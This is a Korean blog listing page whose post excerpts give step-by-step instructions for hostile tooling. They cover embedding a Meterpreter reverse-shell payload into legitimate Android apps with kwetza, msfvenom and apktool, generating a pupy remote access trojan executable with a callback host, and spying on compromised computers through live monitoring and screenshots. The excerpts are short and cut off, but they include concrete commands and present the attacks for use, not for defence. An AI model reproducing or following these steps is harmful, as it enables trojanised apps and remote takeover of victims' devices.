분류 전체보기257 안드로이드 앱에 악성코드 넣기 [kwetza] https://github.com/sensepost/kwetza GitHub - sensepost/kwetza: Python script to inject existing Android applications with a Meterpreter payload. Python script to inject existing Android applications with a Meterpreter payload. - GitHub - sensepost/kwetza: Python script to inject existing Android applications with a Meterpreter payload. github.com kwetza와 함께 apktool도 필요합니다. apktool은 apk 파일을 디컴파일 .. 2023. 12. 26. RAT(Remote Access Trojan) 툴 pupy 설치하기 1.git clone으로 설치 2.git submodule init 3.git submodule update 4../install.sh 혹은 pupy/pupy 폴더 안에서 pip install -r requirements.txt 5.pupy/pupy 폴더 안에서 ./pupygen.py -O windows -A x64 -o virus.exe connect --host 192.168.1.1 --transport ssl 로 바이러스 생성 6.pupy.conf 파일을 열어 address와 port룰 변경 7.pupysh.py를 실행 2023. 12. 26. Apktool을 활용 안드로이드 앱에 수동으로 악성코드 넣기 1.msfvenom의 android/meterpreter/reverse_tcp 를 이용 payload.apk를 생성한다. 2.폴더 안에 악성코드 넣을 앱 파일과 payload.apk를 넣고 apktool d payload.apk 와 apktool d 앱파일.apk 를 하여 디코딩 해준다. (apk는 압축파일과 비슷하므로 디코딩으로 풀어준다. 3.디코딩후 만들어진 폴더의 payload 폴더로 가서 smali/com/ 안의 metasploit 폴더를 복사해서 앱파일 폴더의 smali/com 안에 cp -r metasploit경로 . 명령어로 넣어준다. 4.두 개의 폴더 안의 Android 매니페스트 파일을 leafpad 등으로 열어주고 payload의 uses permission 에서 feature 까지 복.. 2023. 12. 26. 해킹된 컴퓨터를 실시간 모니터링하기 & 자동 스크린샷 캡처 https://blog.naver.com/dhwkffk/221930979010 해킹된 컴퓨터를 실시간 모니터링하기 & 자동 스크린샷 캡처 해킹은 msfvenom으로 바이러스를 만들고 handler.rc로 리스닝을 하여 해킹하였습니다. 1.VNC 라는 메타... blog.naver.com 2023. 12. 26. 이전 1 ··· 26 27 28 29 30 31 32 ··· 65 다음